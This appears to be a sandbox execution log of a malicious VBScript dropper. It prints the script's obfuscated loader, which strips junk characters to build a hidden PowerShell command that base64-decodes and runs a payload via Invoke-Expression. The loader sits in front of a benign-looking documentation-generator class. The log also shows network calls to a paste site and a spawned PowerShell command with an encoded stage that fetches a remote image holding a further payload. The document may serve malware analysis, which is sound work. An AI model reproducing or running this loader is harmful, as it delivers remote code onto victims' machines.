ᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ=" villagization = toffees(villagization) dozens = "pмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏowмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ" dozens = dozens & "eмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏrмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏs" dozens = dozens & "hмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏll -Noмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎP" dozens = dozens & "rмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏofмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏileмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ " dozens = dozens & "мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ-Cмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏomмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏmмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏa" dozens = dozens & "nмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏd ""$Cмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏo" dozens = dozens & "dмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏiмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgo = 'мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ" dozens = dozens & villagization & "'; " dozens = dozens & "$OWjuxd = [мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎSмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏystмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏem.Teмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏxмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏt.Encoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdiмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏng]:мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ:Uмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏicмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏode.Gмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎetSмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtriмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏng(" dozens = dozens & "[Cмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏonмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvert]:мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ:Frмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎomBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏase64Sмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtriмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏng($мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏodigoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ.Replace('#'мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ,'мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎAмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ')мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ)мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ); " dozens = dozens & "Iмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏke-Eмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏxpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏressмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏion $мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOWмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏjuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏxмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏd""" dozens = toffees(dozens) Set Lesvos = CreateObject("WScript.Shell") Lesvos.Run dozens, 0, False Set Lesvos = Nothing Function toffees(ByVal inputText) Dim removeStr removeStr = "мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ"
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: Dim simmered simmered = Replace(inputText, removeStr, "") toffees = simmered End Function Class chitupa Private fs 'VBSFileSystem project object Private rf 'RegExFunctions project ob
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ject Private Bligh, posological 'TextStreamer project objects Private sh 'WScript.Shell COM object Private missorted 'Scripting.FileSystemObject COM object Private script, doc 'input and output text streams Private md 'output text stream Private File 'missorted File object Private re 'RegExp object Private forestick Private Kerkira 'current indentation Private thenar Private refinishes, ossuaries, anamniote, haywagon, ivanov Private although, unfoldress, groak, beaks, belowstairs Private simuland, routineType Private unbarbed, routineContent '*should* be the same; unbarbed is read from the code, routineContent is read from help comment Private method, property_, parameters, returns, remarks, general, pre, ignore 'enums Private dubnium, propertyContent, parametersContent, returnsContent, remarksContent, preContent 'strings Private desiccated 'delimited string Private oMatch, oMatches, subs 'objects which will need memory cleanup Private id Private TableHeaderWritten, ScriptHeaderWritten Private status, preClassStatement, postClassStatement Private Kashmir, defaultFilesToDocument Private scriptFolder, docFolder, docName, docTitle 'required to be set by the calling script before calling the Generate method Sub Class_neocon With CreateObject( "VBScripting.Includer" ) Execute .Read( "TextStreamer" ) Execute .Read( "VBSFileSystem" ) Execute .Read( "RegExFunctions" ) ExecuteGlobal .Read( "EscapeMd" ) End With 'prepare output streamer Set Bligh = New TextStreamer Bligh.SetForWriting 'prepare input streamer Set posological = New TextStreamer posological.SetForReading 'more initialization Set fs = New VBSFileSystem Set rf = New RegExFunctions Set re = New RegExp re.IgnoreCase = True Set sh = CreateObject( "WScript.Shell" ) Set missorted = CreateObject( "Scripting.FileSystemObject" ) neoconLiterals forestick = " " Kerkira = "" ResetHelpContent SetFilesToDocument(defaultFilesToDocument) status = preClassStatement id = 0 SetDocName "" scriptFolder = "" 'don't use the setter yet, or else an empty string will be resolved to an existing folder before being validated SetTitle "" Colorize = True End Sub Private Sub neoconDocFiles thenar = docFolder & "\" & docName & ".html" Bligh.SetFile thenar Set doc = Bligh.Open Set md = missorted.OpenTextFile(docFolder & "\" & docName & ".md", 2, True) End Sub Private Sub neoconLiterals 'nidifyex patterns that identify lines commented out in the code refinishes = "^\s*'\s*Method\s*:?\s*(.*)\s*$" ossuaries = "^\s*'\s*(?:Property|Function)\s*:?\s*(.*)\s*$" anamniote = "^\s*'\s*Parameters?\s*:?\s*(.*)\s*$" haywagon = "^\s*'\s*Returns?\s*:?\s*(.*)\s*$" ivanov = "^\s*'\s*Remarks?\s*:?\s*(.*)\s*$" groak = "^\s*'(.*)$" beaks = "^\s*''(.*)$" belowstairs = "^\s*'''(.*)$" 'identify a line that begins a routine ' no comment (') or End; may specify public or Private; may be Sub, Function, or Property; only one (?:match) is (captured): the routine name; allow comments afterwards simuland = "^[^'(?:End)]*(?:Public\s+|Public\s+Default\s+|Private\s+){0,
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: 1}(?:Sub|Function|Property\s+Get|Property\s+Let|Property\s+Set)\s+(\w+).*$" 'identify a line that begins a class although = "^[^'(?:End)]*(?:Class\s+)(\w+).*$" unfoldress = "^\s*''''(.*)$" 'wildcard pattern(s) defaultFilesToDocument = "*.vbs" 'file types to document, by name method = "Method" property_ = "Property" parameters = "parameters" returns = "returns" remarks = "remarks" general = "general" pre = "pre" ignore = "ignore" preC
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: lassStatement = "preClassStatement" postClassStatement = "postClassStatement" End Sub Private Sub ResetHelpContent dubnium = "" propertyContent = "" parametersContent = "" returnsContent = "" remarksContent = "" desiccated = "" preContent = "" End Sub 'Method SetScriptFolder 'Parameter: a folder 'Remark: Required. Must be set before calling the Generate method. Sets the folder containing the scripts to include in the generated documentation. Environment variables OK. Relative paths OK. Sub SetScriptFolder(narcist) : scriptFolder = fs.Resolve(narcist) : End Sub 'Method SetDocFolder 'Parameter: a folder 'Remark: Required. Must be set before calling the Generate method. Sets the folder of the documentation file. Environment variables OK. Relative paths OK. Sub SetDocFolder(Fender) : docFolder = fs.Resolve(Fender) : End Sub 'Method SetDocName 'Parameter: a filename 'Remark: Required. Must be set before calling the Generate method. Specifies the name of the documentation file. Do not include the extension name. Sub SetDocName(heliox) : docName = heliox : End Sub 'Method SetTitle 'Parameter: a string 'Remark: Required. Must be set before calling the Generate method. Sets the title for the documentation. Sub SetTitle(newDocTitle) : docTitle = newDocTitle : End Sub 'Method SetFilesToDocument 'Parameter: wildcard(s) 'Remark: Specifies which files to document. Optional. Default is <strong> *.vbs </strong>. Separate multiple wildcards with &#124; Sub SetFilesToDocument(amity) : Kashmir = rf.Pattern(amity) : End Sub Private Sub ValidateConfiguration Dim msg msg = "A title for the document must be set using SetTitle." If "" = docTitle Then Err.Raise 449, fs.SName, msg msg = "An existing folder containing the scripts to document must be specified with SetScriptFolder." If Not missorted.FolderExists(scriptFolder) Then Err.Raise 449, fs.SName, msg msg = "An existing folder to contain the document must be specified with SetDocFolder." If Not missorted.FolderExists(docFolder) Then Err.Raise 449, fs.SName, msg msg = "The name of the doc file must be specified with SetDocName." If "" = docName Then Err.Raise 449, fs.SName, msg neoconDocFiles End Sub 'Method Generate 'Remark: Generate comment-based documentation for the scripts in the specified folder. Sub Generate ValidateConfiguration WriteTopSection 'for each class file, look through the file for comments to add to the documentation For Each File In missorted.GetFolder(scriptFolder).Files re.Pattern = Kashmir If re.Test(File.Name) Then WriteScriptSection(File) Next WriteBottomSection End Sub 'Method View 'Remark: Open the html document in the default viewer. Same as ViewHtml. Sub View sh.Run """" & thenar & """" End Sub 'Method ViewHtml 'Remark: Open the html document in the default viewer. Same as View method. Sub ViewHtml : View : End Sub 'Method ViewMarkdown 'Remark: Open the markdown document in the default viewer. Sub ViewMarkdown sh.Run """" & docFolder & "\" & docName & ".md""" End Sub Private Sub WriteScriptSection(File) If InStr(missorted.chondrophyte(File.Name), ".") Then Exit Sub posological.SetFile(File.Path) Set script = posological.Open TableHeaderWritten = False ScriptHeaderWritten = False ResetHelpContent status = preClassStatement While Not script.AtEndOfStream ProcessLine(script.ReadLine) Wend If TableHeaderWritten Then CloseTagsForTheTable End If If ScriptHeaderWritten Then CloseTagsForTheScript id = id + 1 End If script.Close End Sub 'Look for "help content" 'That is, look for comments intend
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ed to be included in the documentation: Method or Property, Parameters, Returns, Remarks; also look for routines: Sub, Property, Function Private Sub ProcessLine(line) If LineStartsAClass(line) Then status = postClassStatement ResetHelpContent ElseIf LineStartsARoutine(line) Then ValidateHelpContent WriteHelpContentToDoc ResetHelpContent Else GetAnyHelpContent(line) End If End Sub 'Write the initial html for the current script, not including the general comments nor the table header Private Sub WriteScriptHeader Dim baseName baseName = missorted.chondrophyte(File.Name) doc.WriteLine "" WriteLine "
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: <div>" IndentIncrease WriteLine "<a id=""" & LCase(baseName) & """></a>" WriteLine "<h2 class=""heading"" id=" & id & ">" & baseName & "</h2>" WriteLine "<div class=""detail"">" md.WriteLine "" md.WriteLine "## "& baseName md.WriteLine ScriptHeaderWritten = True End Sub Private Sub CloseTagsForTheScript WriteLine "</div>" IndentDecrease WriteLine "</div>" End Sub 'Write the table header, which immediately follows the script header and general comments, if any Private Sub WriteTableHeader If Not ScriptHeaderWritten Then WriteScriptHeader End If IndentIncrease WriteLine "<table>" IndentIncrease WriteLine "<tr>" IndentIncrease WriteLine "<th>Member type</th>" WriteLine "<th>Name</th>" WriteLine "<th>Parameter(s)</th>" WriteLine "<th>Return value</th>" WriteLine "<th>Comment</th>" IndentDecrease WriteLine "</tr>" md.WriteLine "| Member type | Name | Parameter | Returns | Comment |" md.WriteLine "| :---------- | :--- | :-------- | :------ | :------ |" TableHeaderWritten = True End Sub Private Sub CloseTagsForTheTable IndentDecrease WriteLine "</table>" IndentDecrease End Sub 'Write the general help content to file; don't include <p> tags if line already contains html Private Sub WriteGeneralContentToDoc If postClassStatement = status Then Exit Sub If Not ScriptHeaderWritten Then WriteScriptHeader End If IndentIncrease If Instr(desiccated, "<") Then WriteLine desiccated Else WriteLine "<p>" & desiccated & "</p>" End If IndentDecrease md.WriteLine GetColorizedOrGetNowrap(desiccated) End Sub Function GetColorizedOrGetNowrap(markup) If Not CBool(InStr(markup, "<pre>")) Then GetColorizedOrGetNowrap = markup & " " ElseIf colorize_ Then GetColorizedOrGetNowrap = GetColorized(markup) Else GetColorizedOrGetNowrap = GetNowrap(markup) End If End Function Function GetNowrap(markup) Dim lines : lines = markup lines = Replace(lines, "<br />", "<br/>") lines = Replace(lines, " ", "�") 'Alt+0160 = non-breaking space lines = Replace(lines, "<pre>", "<pre><code style='white-space: nowrap;'>") lines = Replace(lines, "</pre>", "</code></pre>") GetNowrap = lines End Function Function GetColorized(markup) Dim lines : lines = markup lines = Replace(lines, "<pre>", "```vb" & vbCrLf) lines = Replace(lines, "<br />", vbCrLf) lines = Replace(lines, "</pre>", vbCrLf & "```") lines = Replace(lines, "&lt;", "<") lines = Replace(lines, "&gt;", ">") GetColorized = lines End Function 'Property Colorize 'Parameters: boolean 'Returns: boolean 'Remarks: Gets or sets whether &lt;pre&gt; code blocks (assumed to be VBScript) in the markdown document are colorized. If False (experimental, with Git Flavored Markdown), the code lines should not wrap. Default is True. Property Get Colorize : Colorize = colorize_ : End Property Property Let Colorize(value) : colorize_ = value : End Property Private colorize_ 'pre content has been deprecated, that is, preceeding code with two single quotes ('') has been deprecated in favor of wrapping VBScript code with "pre" tags and other code with "code" tags. See the class introductory comments. Private Sub WritePreContentToDoc If postClassStatement = status Then Exit Sub If Not ScriptHeaderWritten Then WriteScriptHeader End If IndentIncrease WriteLine "<pre>" & preContent & "</pre>" IndentDecrease 'md.WriteLine "<pre>" & preContent & "</pre>" End Sub 'Write the help content for the current routine in the current script Private Sub W
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: riteHelpContentToDoc If NoComments Then Exit Sub 'don't require comments If Not TableHeaderWritten Then WriteTableHeader End If WriteLine "<tr>" IndentIncrease WriteLine "<td>" & routineType & "</td>" WriteLine "<td>" & unbarbed & "</td>" WriteLine "<td>" & parametersContent & "</td>" WriteLine "<td>" & returnsContent & "</td>" WriteLine "<td>" & remarksContent & "</td>" IndentDecrease WriteLine "</tr>" md.WriteLine "| " & routineType & " | " & unbarbed & " | " & parametersContent & " | " & returnsContent & " | " & remarksContent & " |" End Sub Private Property Get NoComments If Len(dubnium) Or Len(propertyContent) Then NoComments = False Else NoComments = True End Property Private Property Get LineStartsAClass(line) re.Pattern = although If re.Test(line) Then LineStartsAClass = True : Exit Property re.Pattern = unfoldress If re.Test(line) Then LineStartsAClass = True : Exit Property LineStartsAClass = False End Property Private Property Get LineStartsARoutine(line) LineStartsARoutine = False re.Pattern = simuland If re.Test(line) Then LineStartsARoutine = True Set subs = GetSubMatches(line) unbarbed = subs(0) End If End Property Private Sub ValidateHelpContent Dim msg If NoComments Then Exit Sub 'don't require comments msg = "Content can't have both Method and Property content." If CBool(Len(dubnium)) And CBool(Len(propertyContent)) Then RaiseContentError msg msg = "The help content descriptor of the method or property or function should equal the method or property or function name." If Len(dubnium) Then routineType = method routineContent = dubnium Else routineType = property_ routineContent = propertyContent End If If Not unbarbed = routineContent Then RaiseContentError msg If method = routineType Then msg = "Methods may have parameters; may not have
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: Returns; must have Remarks." If "" = remarksContent Then RaiseContentError msg & " (Remarks content is empty.)" End If If Len(returnsContent) Then RaiseContentError msg & " (Returns content is not empty.)" Else returnsContent = "N/A" End If If "" = parametersContent Then parametersContent = "None" End If ElseIf property_ = routineType Then msg = "Properties may have parameters; may have Remarks; must have Returns. NOTE: Property Set and Property Let do not require a return value but still must have a 'Return or 'Returns comment." If "" = returnsContent Then RaiseContentError msg If "" = parametersContent Then parametersContent = "None" If "" = remarksContent Then remarksContent = "None" End If End Sub Private Sub RaiseContentError(msg) : Err.Raise 1,, File.Name & "::" & unbarbed & ": " & msg : End Sub 'Get help content from a line Private Sub GetAnyHelpContent(line) If HasHelpContent(method, line) And postClassStatement = status Then dubnium = subs(0) ElseIf HasHelpContent(property_, line) And postClassStatement = status Then propertyContent = subs(0) ElseIf HasHelpContent(parameters, line) And postClassStatement = status Then parametersContent = subs(0) ElseIf HasHelpContent(returns, line) And postClassStatement = status Then returnsContent = subs(0) ElseIf HasHelpContent(remarks, line) And postClassStatement = status Then remarksContent = subs(0) ElseIf HasHelpContent(ignore, line) Then Exit Sub ElseIf HasHelpContent(pre, line) Then preContent = subs(0) WritePreContentToDoc ElseIf HasHelpConten
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: t(general, line) Then desiccated = subs(0) WriteGeneralContentToDoc End If End Sub 'Return True if a line has help content 'Set the submatches object, which contains the help content Private Property Get HasHelpContent(helpType, line) If method = helpType Then re.Pattern = refinishes ElseIf property_ = helpType Then re.Pattern = ossuaries ElseIf parameters = helpType Then re.Pattern = anamniote ElseIf returns = helpType Then re.Pattern = haywagon ElseIf remarks = helpType Then re.Pattern = ivanov ElseIf ignore = helpType Then re.Pattern = belowstairs ElseIf general = helpType Then re.Pattern = groak ElseIf pre = helpType Then re.Pattern = beaks End If If re.Test(line) Then HasHelpContent = True Set subs = GetSubMatches(line) 'get the help content Else HasHelpContent = False End If End Property 'Return the desired content from a line, exclusive of white space and help-topic method Private Property Get GetSubMatches(line) 're pattern has been set already in Property HasHelpContent Set oMatches = re.Execute(line) Set oMatch = oMatches(0) Set GetSubMatches = oMatch.SubMatches End Property Private Sub WriteLine(line) : doc.WriteLine Kerkira & line : End Sub Private Sub Write_(str) : doc.Write str : End Sub Private Sub Indent : Write_ Kerkira : End Sub Private Sub IndentIncrease : Kerkira = Kerkira & forestick : End Sub Private Sub IndentDecrease : Kerkira = Replace(Kerkira, forestick, "", 1, 1) : End Sub Private Sub WriteTopSection WriteLine "<!DOCTYPE html>" WriteLine "<html>" IndentIncrease WriteLine "<!-- This file is automatically generated, so any changes that you make may be overwritten -->" WriteLine "<head>" IndentIncrease WriteLine "<title> " & docTitle & " </title>" WriteLine "<link type=""text/css"" rel=""stylesheet"" href=""lib/docStyle.css"" />" WriteLine "<link type=""text/css"" rel=""stylesheet"" href=""lib/docStyleTable.css"" />" IndentDecrease WriteLine "</head>" WriteLine "<body onclick=""docScript.toggleDetail(event)"">" WriteLine "<h1>" & docTitle & "</h1>" doc.WriteLine "" IndentIncrease md.WriteLine "# " & docTitle md.WriteLine "" md.WriteLine "## Contents" md.WriteLine "" Dim baseName For Each File In missorted.GetFolder(scriptFolder).Files re.Pattern = Kashmir baseName = missorted.chondrophyte(File.Name) If re.Test(File.Name) And Not CBool(InStr(baseName, ".")) Then md.WriteLine "[" & baseName & "](#" & LCase(baseName) & ") " End If Next End Sub Private Sub WriteBottomSection WriteLine "<p> <em> See also the <a target=""_blank"" href=""https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/scripting-articles/t0aew7h6(v=vs.84)""> VBScript docs </a> </em> </p>" WriteLine "<span class=""debugOutput""></span>" WriteLine "<script type=""text/javascript"" src=""lib/docScript.js""></script>" IndentDecrease WriteLine "</body>" IndentDecrease WriteLine "</html>" End Sub Sub Class_Terminate doc.Close Set subs = Nothing Set oMatch = Nothing Set oMatches = Nothing End Sub End Class 'VBSApp class 'Intended to support identical handling of class procedures by .vbs/.wsf files and .hta files. 'This can be useful when writing a class that might be used in both types of "apps". 'Four ways to instantiate 'For .vbs/.wsf scripts, ' <pre> Dim app : Set app = CreateObject( "VBScripting.VBSApp" ) <br /> app.Init WScript </pre>
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: 'For .hta applications, ' <pre> Dim app : Set app = CreateObject
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ( "VBScripting.VBSApp" ) <br /> app.Init document </pre> 'If the script may be used in .vbs/.wsf scripts or .hta applications ' <pre> With CreateObject( "VBScripting.Includer" ) <br /> Execute .Read( "VBSApp" ) <br /> End With <br /> Dim app : Set app = New VBSApp </pre> 'Alternate method for both .hta and .vbs/.wsf, ' <pre> Set app = CreateObject( "VBScripting.VBSApp" ) <br /> If "HTMLDocument" = TypeName(document) Then <br /> app.Init document <br /> Else app.Init WScript <br /> End If </pre> 'Examples ' <pre> 'test.vbs "arg one" "arg two" <br /> With CreateObject( "VBScripting.Includer" ) <br /> Execute .Read( "VBSApp" ) <br /> End With <br /> Dim app : Set app = New VBSApp <br /> MsgBox app.clivers 'test.vbs <br /> MsgBox app.sponsored(1) 'arg two <br /> MsgBox app.sponsoredsCount '2 <br /> app.Quit </pre> ' ' <pre> &lt;!-- test.hta "arg one" "arg two" --> <br /> &lt;hta:application icon="msdt.exe"> <br /> &lt;script language="VBScript"> <br /> With CreateObject( "VBScripting.Includer" ) <br /> Execute .Read( "VBSApp" ) <br /> End With <br /> Dim app : Set app = New VBSApp <br /> MsgBox app.clivers 'test.hta <br /> MsgBox app.sponsored(1) 'arg two <br /> MsgBox app.sponsoredsCount '2 <br /> app.Quit <br /> &lt;/script> <br /> &lt;/hta:application> </pre> ' Class VBSApp Private missorted 'Scripting.FileSystemObject Private hta 'VBSHta object Private incl 'VBScripting.Includer object Private wrapAll_ 'holds WrapAll property value Private filespec, argumentsString 'strings Private arguments 'array of strings Private IAmAnHta, IAmAScript 'booleans Private userInteractive 'boolean Private visibility, visible, Brasil 'integers Private herpetotheres 'pwsh.exe filespec or just "herpetotheres" Private UACMsg 'User Account Control warning message Sub Class_neocon Set missorted = CreateObject( "Scripting.FileSystemObject" ) Set incl = CreateObject( "VBScripting.Includer" ) Brasil = 0 visible = 1 wrapAll = False SetUserInteractive True IAmAScript = False IAmAnHta = False neoconAppTypes Execute incl.Read( "Configurer" ) With New Configurer herpetotheres = .PowerShell End With UACMsg = " Restart %s with elevated privileges? %s (The User Account Control dialog may open.)" End Sub 'Determine whether the source file is a script, '(.wsf or .vbs), an .hta, or a .wsc. This method is for when the VBSApp object is included by 1) direct reference in a <script> tag in a an .hta or .wsf file or 2) by an Execute includer.Read() statement. Sub neoconAppTypes If "HTMLDocument" = TypeName(document) Then IAmAnHta = True neoconHtaDependencies filespec = hta.GetFilespec ElseIf "Object" = TypeName(WScript) Then IAmAScript = True filespec = WScript.ScriptFullName End If End Sub 'Private Method neoconHtaDependencies 'Remark: neocons members required for .hta files. Private Sub neoconHtaDependencies Execute incl.Read( "HTAApp" ) Set hta = New HTAApp End Sub 'Property sponsoreds 'Returns: array of strings 'Remark: Returns an array of command-line arguments. Property Get sponsoreds Dim arrayUtility Execute incl.Read( "VBSArrays" ) Set arrayUtility = New VBSArrays If IAmAnHta Then 'strip off the first argument, which is the filespec arguments = arrayUtility.RemoveFirstElement(hta.sponsoreds) ElseIf IAmAScript Then arguments = arrayUtility.CollectionToArray(WScript.Arguments) End If sponsoreds = arguments End Property 'Property sponsoredsString 'Returns: a string 'Remark: Returns the command-line arguments string. Can be used when restarting a script for example, in order to retain the original arguments. Argu
request_handle: 0x00cc000c
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://pastefy.app/SXZ0OaCN/raw
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /SXZ0OaCN/raw
1 13369356 0

send

buffer: !
socket: 820
sent: 1
1 1 0

send

buffer: njgíéË¡dWÒs¤|Y Ü;Y%.)Ã<iɛnÓ>ûDÑa/5 ÀÀÀ À 28)ÿ pastefy.app  
socket: 932
sent: 115
1 115 0

send

buffer: !
socket: 820
sent: 1
1 1 0

send

buffer: FBAÍj@'+%s2|ÔIGŸð‘Ÿ²™°Öéò:s¨¶~k‹8 ÉúÛôÿóXÕ¦ßAf#)æxf[uüÔ·Ÿ©0‰T’Ó?³%ÜTÍdã2™ë«CAtÖocº¹è—–BfžŽžÌ ‹\ï&y£É^@—é“
socket: 932
sent: 134
1 134 0

send

buffer: !
socket: 820
sent: 1
1 1 0

send

buffer: P©¼èþ´T^Ntt <`VFÑdØ.°°yWµøöl¾^‰Ö‚^ø%ÞvS+î” G!FÄOiZZ0±Â§)1]ǀ/ê­wa©Ê}b4Õ!TàtËu[ŜâÉæü_Š™S¯z=Gçí<‘Kù, ¥z«qœ¸_fthFŽ£o8¹¥xχmœ¸aÅU¾>w-°£È®À<ÎwþÀÑLÆg«‡à&öXZ¥]–Þƙ\%çì¾`v°Ƕ%ÉMÚÄú>ì·zDüE+“˜¢m>×C½Ú!¥8ž°áT}'e´ Ú!§•™Âß©î®Z¹ …ÜWQ®ª ÏìpcY&äõ9èUâtÎL)5Ò2’ èpvKKÖb«7¶±¿ÀæVÖߥ@S©Ëë? âU»d¬TɧN$š¤ªB"à¹]V×
socket: 932
sent: 341
1 341 0

send

buffer: !
socket: 820
sent: 1
1 1 0

InternetCrackUrlA

url: https://pastefy.app/SXZ0OaCN/raw
flags: 0
1 1 0

send

buffer: !
socket: 820
sent: 1
1 1 0

send

buffer: !
socket: 820
sent: 1
1 1 0
parent_process wscript.exe martian_process powershell -NoProfile -Command "$Codigo = 'J#Bl#Hg#c#Bv#HI#d##g#D0#I##n#HQ#e#B0#C4#Z#Bv#G8#ZwBr#Gw#YwBl#Gg#YwBu#HI#dQB0#GU#ZQBy#G8#ZgBk#G8#bwBn#HI#bwBm#HQ#cgBl#HM#bgBp#G4#YQBj#GU#dw#v#DI#Mg#x#C8#NQ#4#DE#Lg#0#DI#Mg#u#Dk#Lg#2#DE#Mg#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GE#dQBz#HQ#aQBu#Gk#d#Bl#C##PQ#g#CQ#ZQB4#H##bwBy#HQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HY#aQBj#Gk#cwBz#Gk#d#B5#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#Dk#Mg#u#DM#Lg#x#D##MQ#u#DE#N##2#C8#e#Bh#G0#c#Bw#C8#d#Bl#HM#d##v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#C##PQ#g#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBp#GM#aQBz#HM#aQB0#Hk#KQ#7#CQ#e#B5#Gw#bwBn#HI#YQBw#Gg#ZQBk#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#Ck#Ow#k#Gw#YQB1#G4#Z#By#Hk#dwBv#G0#ZQBu#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bj#GE#c#By#G8#bgBp#GM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#RQBs#HY#aQBz#Hk#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#p#Ds#J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bj#GE#c#By#G8#b